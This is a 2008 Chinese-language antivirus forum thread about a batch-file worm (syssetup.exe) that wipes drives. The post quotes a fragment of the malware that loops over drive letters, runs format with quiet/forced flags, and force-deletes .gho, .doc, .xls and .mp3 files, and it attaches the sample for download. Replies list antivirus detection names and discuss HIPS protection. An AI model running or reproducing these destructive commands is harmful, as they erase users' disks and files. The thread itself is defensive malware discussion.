會格式化所有磁碟的批次病毒

發表時間: 2008-9-18 12:25 作者: sylovanas 來源: AVPClub Security Home

這個也有受害者，不過因為破壞性高所以沒什麼人有提到

只是剛好有人有中我提到這一個所以他抓到樣本了

放上來給各位看看

擷取裡面一小段字串

f o r % % i i n ( d e f g h i j k ) d o ( Z f s u t i l f s i n f o d r i v e t y p e % % i : | f i n d s t r / i " ....f o r m a t % % i : / q / y / x

d e l / s / f / q % % i \ * . g h o & d e l / s / f / q % % i \ * . d o c & d e l / s / f / q % % i \ * . x l s & d e l % % i \ * . m p 3

[ 本帖最後由 sylovanas 於 2008-9-18 12:28 編輯 ]

syssetup.rar
(2008-09-18 12:25:07, Size: 15.1 kB, Downloads: 28)

我也來說兩句 查看全部評論相關評論

PIONEERA15FXDBC (2008-9-18 14:03:38)
wopti (2008-9-18 15:24:22)

驱逐舰发现病毒
Win32.HLLW.Autoruner.1175
卡巴斯基 (2008-9-18 17:42:58)

如果我在KIS2009的HIPS上已經封鎖了C:\Windows\System32\format.com
是不是病毒就不可以格式化我的電腦?
integear (2008-9-18 17:46:48)

QUOTE:
原帖由 卡巴斯基 於 2008-9-18 17:42 發表
如果我在KIS2009的HIPS上已經封鎖了C:\Windows\System32\format.com
是不是病毒就不可以格式化我的電腦?
看是否有調度到,如果不是調度該執行檔,那就沒用 .
jm5513581 (2008-9-18 20:59:53)

NOD32 3.0
病毒資料庫3449
未發現病毒
已上報
chou (2008-9-18 22:35:35)

ESS 3.0
病毒資料庫3452
syssetup.rar > RAR > syssetup.exe - Win32/AutoRun.AAH 蠕蟲

AVK2007
物件: syssetup.exe
在壓縮檔中: syssetup.rar
狀態: 已偵測病毒
病毒: Worm.Win32.VB.gh (引擎 A)

[ 本帖最後由 chou 於 2008-9-18 22:38 編輯 ]
sun88990 (2008-9-18 22:48:26)

W32/Autorun.worm.h
ㄚ一 (2008-9-19 00:08:45)

QUOTE:
原帖由 卡巴斯基 於 2008-9-18 17:42 發表
如果我在KIS2009的HIPS上已經封鎖了C:\Windows\System32\format.com
是不是病毒就不可以格式化我的電腦?
KIS預設就防low level disk access
卡巴斯基 (2008-9-19 18:47:42)

明白了!謝謝~原來KIS防到~
junberry (2008-9-19 19:04:45)

Trend Micro Internet Security Pro 2009 ：WORM_VB.AFJ
integear (2008-9-20 19:41:08)

McAfee-
syssetup.exe-W32/Autorun.worm.h